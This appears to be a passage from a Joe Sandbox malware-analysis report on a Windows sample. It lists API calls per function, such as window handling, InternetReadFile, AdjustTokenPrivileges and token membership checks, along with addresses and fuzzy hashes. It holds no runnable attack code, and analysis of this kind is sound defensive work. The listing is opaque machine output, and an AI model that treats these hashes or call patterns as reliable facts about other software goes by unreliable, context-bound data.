                                    • GetCursorPos.USER32(?), ref: 0090C4D2
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008BB9AB,?,?,?,?,?), ref: 0090C4E7
                                    • GetCursorPos.USER32(?), ref: 0090C534
                                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,008BB9AB,?,?,?), ref: 0090C56E
                                    Similarity
                                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                    • String ID:
                                    • API String ID: 1423138444-0
                                    • Opcode ID: c74dd2b9948b70b11783794eadd6e66d78066a3f7f161f83d639198e3a9f2639
                                    • Instruction ID: 45d7bcf77c9b73a44cd6d4680d3dd73da8b754bc65ae31b4f3848d17a6c69212
                                    • Opcode Fuzzy Hash: c74dd2b9948b70b11783794eadd6e66d78066a3f7f161f83d639198e3a9f2639
                                    • Instruction Fuzzy Hash: 79317379614058AFCB25CF98CC68EBA7BB9FB09310F444265F905CB2A1C731AD51EBA4
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008812D8
                                    • GetClientRect.USER32(?,?), ref: 008BB5FB
                                    • GetCursorPos.USER32(?), ref: 008BB605
                                    • ScreenToClient.USER32(?,?), ref: 008BB610
                                    Similarity
                                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                    • String ID:
                                    • API String ID: 1010295502-0
                                    • Opcode ID: f8ec66eb99888a466ecc126e3b0692c9eebe762d6d3d2e35dd2c7cc6e1650f35
                                    • Instruction ID: f2823bc9d03ad61c51a0477cfdb5e60f8611ca2257989150a9fc7ba08d33ec90
                                    • Opcode Fuzzy Hash: f8ec66eb99888a466ecc126e3b0692c9eebe762d6d3d2e35dd2c7cc6e1650f35
                                    • Instruction Fuzzy Hash: 7911E335A14119AFCF10EFA8D8899AE77B8FB05311F500466F901E7251DB30BA529BA6
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008DE628
                                    Strings
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($|
                                    • API String ID: 1659193697-1631851259
                                    • Opcode ID: 1a451526a6ed1f666b65ac05a965ea52d620542cf27db89fc070436c33abac5a
                                    • Instruction ID: 73302ca820e0a8bb414e234dbb0da7261703471f84c55f381ece2c0b25667ae3
                                    • Opcode Fuzzy Hash: 1a451526a6ed1f666b65ac05a965ea52d620542cf27db89fc070436c33abac5a
                                    • Instruction Fuzzy Hash: E1323575A007059FDB28DF19D4819AAB7F0FF58320B15C56EE89ADB3A1E770E941CB40
                                    APIs
                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008F180A,00000000), ref: 008F23E1
                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 008F2418
                                    Similarity
                                    • API ID: Internet$AvailableDataFileQueryRead
                                    • String ID:
                                    • API String ID: 599397726-0
                                    • Opcode ID: 8944eb57b5ba910de0515375a6d47541768b33fc0be810aa70e8642676296efe
                                    • Instruction ID: 25bec455350024ec351f5a7a8530550d35e2dd3003ecd833a75bb4cdf2d25c41
                                    • Opcode Fuzzy Hash: 8944eb57b5ba910de0515375a6d47541768b33fc0be810aa70e8642676296efe
                                    • Instruction Fuzzy Hash: 4241C5B190420DBFEB20DEB5DC85EBBB7BCFB40328F10406AF701E6650DAB59E419A55
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 008EB40B
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008EB465
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008EB4B2
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: d18eb41b66da20345cdd28028ee8e3b26d4678df490c2a5f8df088f0f3f4d9eb
                                    • Instruction ID: c8fce4a3ab97bf3825eaff1446eb64a80bc06176ddac1e00cec5b2a056626943
                                    • Opcode Fuzzy Hash: d18eb41b66da20345cdd28028ee8e3b26d4678df490c2a5f8df088f0f3f4d9eb
                                    • Instruction Fuzzy Hash: 35217135A10108EFCB00EFA9D884AEEBBB8FF49314F1480A9E945EB351DB319955DB51
                                    APIs
                                      • Part of subcall function 008A0DB6: std::exception::exception.LIBCMT ref: 008A0DEC
                                      • Part of subcall function 008A0DB6: __CxxThrowException@8.LIBCMT ref: 008A0E01
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D882B
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8858
                                    • GetLastError.KERNEL32 ref: 008D8865
                                    Similarity
                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                    • String ID:
                                    • API String ID: 1922334811-0
                                    • Opcode ID: 7c0d0bee7c26a604fbf3aaf863fcad5b4ab024a368845a35c64fb5dff2a03a54
                                    • Instruction ID: 3ffe46aafecf219ed5c28160484ee25aff6db7c6d23d8837c56b7698d25a27b3
                                    • Opcode Fuzzy Hash: 7c0d0bee7c26a604fbf3aaf863fcad5b4ab024a368845a35c64fb5dff2a03a54
                                    • Instruction Fuzzy Hash: 65116DB2814204AFE728EFA8DC85D6BB7BDFB45710B20862EE45597741EA30BC409B60
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008D8774
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008D878B
                                    • FreeSid.ADVAPI32(?), ref: 008D879B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: d982a7c5f710d9e629aa4990ea8f950002fbadc95e4ced80489891e6ea7625ae
                                    • Instruction ID: 0f15454a1f9baefe0dc69e1052b3aa1acff4d23206efafcb67ac788050c62052
                                    • Opcode Fuzzy Hash: d982a7c5f710d9e629aa4990ea8f950002fbadc95e4ced80489891e6ea7625ae
                                    • Instruction Fuzzy Hash: 5EF04975A1130CBFDF00DFF4DC99AAEBBBCEF08701F1044A9A901E2681E6716B049B50
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    • GetParent.USER32(?), ref: 008BB7BA
                                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,008819B3,?,?,?,00000006,?), ref: 008BB834
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogNtdllParentProc_
                                    • String ID:
                                    • API String ID: 314495775-0
                                    • Opcode ID: fb1d5d658cf151d02a80cd7213ee81fd99b38b735bfc7d30e049452cb02196e3
                                    • Instruction ID: 75a5694c843e690032695a0bf0c31eb7f47f79a9a4d76c86e5aa682abc4d94af
                                    • Opcode Fuzzy Hash: fb1d5d658cf151d02a80cd7213ee81fd99b38b735bfc7d30e049452cb02196e3
                                    • Instruction Fuzzy Hash: D5219134205508AFCF20AB68C888DA93B9AFB4A324F544264F525DB3B6CB719D12DB50
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 008EC6FB
                                    • FindClose.KERNEL32(00000000), ref: 008EC72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: b5befe4ba557ff3568d7852351e1503827492077def336a42268e0022c2dacfa
                                    • Instruction ID: abea66c6458aa92d35e097baca26d2f393eaf301b899e573cf5584f0d5cd23d5
                                    • Opcode Fuzzy Hash: b5befe4ba557ff3568d7852351e1503827492077def336a42268e0022c2dacfa
                                    • Instruction Fuzzy Hash: A2118E726002059FDB10EF29D845A2AF7E9FF85324F04852EF9AAC7291DB30A905CB81
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,008BB93A,?,?,?), ref: 0090C5F1
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0090C5D7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                                    • String ID:
                                    • API String ID: 1273190321-0
                                    • Opcode ID: 0d4468889ece4b2ea343981ffe65f414f83afc6d263020e9378c7d768d38d948
                                    • Instruction ID: 24f0d5a74c49a175fbdd26be34c8097c61d3d4283342d609a3cf1be8ce8e5256
                                    • Opcode Fuzzy Hash: 0d4468889ece4b2ea343981ffe65f414f83afc6d263020e9378c7d768d38d948
                                    • Instruction Fuzzy Hash: 8701D875204314EFCB259F58CC54F6A3BA6FF89364F140624F9415B3E1CB31A802EB91
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0090C961
                                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,008BBA16,?,?,?,?,?), ref: 0090C98A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClientDialogNtdllProc_Screen
                                    • String ID:
                                    • API String ID: 3420055661-0
                                    • Opcode ID: 29298b2be521c1cd762c6bc2f3f4dfd674e49e287e1e2d66abe87722b1d82d3a
                                    • Instruction ID: f32f54171bdb11c986bfb7b894effcc2ebe0dd856d075246bdf8dcc8c5e74df0
                                    • Opcode Fuzzy Hash: 29298b2be521c1cd762c6bc2f3f4dfd674e49e287e1e2d66abe87722b1d82d3a
                                    • Instruction Fuzzy Hash: A3F03A7241021CFFEF148F85DC09DBE7BB9FB48311F00416AF901A2161D7716A60EBA4
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,008F9468,?,0090FB84,?), ref: 008EA097
                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,008F9468,?,0090FB84,?), ref: 008EA0A9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 15818bdf094589c4a102a8316b2031ca2c5dbc50fec88d7b96cdd54278513138
                                    • Instruction ID: edefc76eea292231ceab70cab111b9aee16c8a8e42daec6c24b9da00ae2f8510
                                    • Opcode Fuzzy Hash: 15818bdf094589c4a102a8316b2031ca2c5dbc50fec88d7b96cdd54278513138
                                    • Instruction Fuzzy Hash: 4EF0823511522DABDB21AFA8CC48FEA776CFF09761F004165F919D6181D630AA40CBA2
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0090CA84
                                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,008BB995,?,?,?,?), ref: 0090CAB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 53746f7db9c26f8c902d828b401b33ea0158bbb737a68edc093437a829ed3385
                                    • Instruction ID: eac2d766ad75f72e25fe695c92a4bce3c6e31a0f91a5469c800487c409f9158b
                                    • Opcode Fuzzy Hash: 53746f7db9c26f8c902d828b401b33ea0158bbb737a68edc093437a829ed3385
                                    • Instruction Fuzzy Hash: E4E02670204208BFEB24CF19CC1AFBA3B58EB00750F408215F856D90E1C7709850E760
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8309), ref: 008D81E0
                                    • CloseHandle.KERNEL32(?,?,008D8309), ref: 008D81F2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: a93696e754b10c204bc7f49e6839119319274e1d8bc70ac5d81a40ec23ef3211
                                    • Instruction ID: ad279494a6b2f5c191bca292e39dd2d274b52e145bbe6b4705099e1dcafbb8e6
                                    • Opcode Fuzzy Hash: a93696e754b10c204bc7f49e6839119319274e1d8bc70ac5d81a40ec23ef3211
                                    • Instruction Fuzzy Hash: 9CE0BF71014610AFEB252B64EC05D7777A9FB043507148929B455C4870DB615DA1EB10
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00914178,008A8D57,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 008AA15A
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008AA163
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                                    • Instruction ID: 9d347e03e5b74be8134238d89a5eea68c94aab785514f3cc65498f40629212e8
                                    • Opcode Fuzzy Hash: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                                    • Instruction Fuzzy Hash: 10B0923106C208AFCA102B91EC19B883FA8EB45BF2F404020F60D84860CB625650AA91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                                    • Instruction ID: 8f3b23ff751fbacf903e686293dc0226f37bfaa1dc8caabf731c47e4240f7708
                                    • Opcode Fuzzy Hash: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                                    • Instruction Fuzzy Hash: 33320321E6DF014DE7239674D822336A659EFB73C4F15D737E82AB5DA6EB28C4839100
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                                    • Instruction ID: 9c460e63e6c13706d1e3be28c58541e9e1442563002f94fdc7fa1ffc5ab2a25e
                                    • Opcode Fuzzy Hash: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                                    • Instruction Fuzzy Hash: 73B1E020E3AF514DD32396398831336BA5CAFBB2D5F51D71BFC2A74D62EB2189839141
                                    APIs
                                    • __time64.LIBCMT ref: 008E889B
                                      • Part of subcall function 008A520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008E8F6E,00000000,?,?,?,?,008E911F,00000000,?), ref: 008A5213
                                      • Part of subcall function 008A520A: __aulldiv.LIBCMT ref: 008A5233
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Time$FileSystem__aulldiv__time64
                                    • String ID:
                                    • API String ID: 2893107130-0
                                    • Opcode ID: f6b95af3ad7d76740f13e7a42c6f374815347677d36e3553246b66777733231a
                                    • Instruction ID: 0d9afd5857af99b48cf15561a0532a637660d5bd66b251d266a464f75e16b24b
                                    • Opcode Fuzzy Hash: f6b95af3ad7d76740f13e7a42c6f374815347677d36e3553246b66777733231a
                                    • Instruction Fuzzy Hash: F321D576635510CBC329CF29D441A52B3E1EFA6310B288E6CE4F5CB2C0CA34A945DB54
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0090D838
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 939e2727fc5d4b301309b9f40083a91db60fb79bb5876baff5ec46a4c788738f
                                    • Instruction ID: f56cead7ac4506370f3d4eae11e3ca12f5b8070aa71b1fef893a0dcd5b7b193a
                                    • Opcode Fuzzy Hash: 939e2727fc5d4b301309b9f40083a91db60fb79bb5876baff5ec46a4c788738f
                                    • Instruction Fuzzy Hash: 93112C75205215BFFB359EACCC06F7A3B5CDB42B20F208724F9119A5E3CB649D10A3A5
                                    APIs
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,008BB952,?,?,?,?,00000000,?), ref: 0090D432
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00881B04,?,?,?,?,?), ref: 008818E2
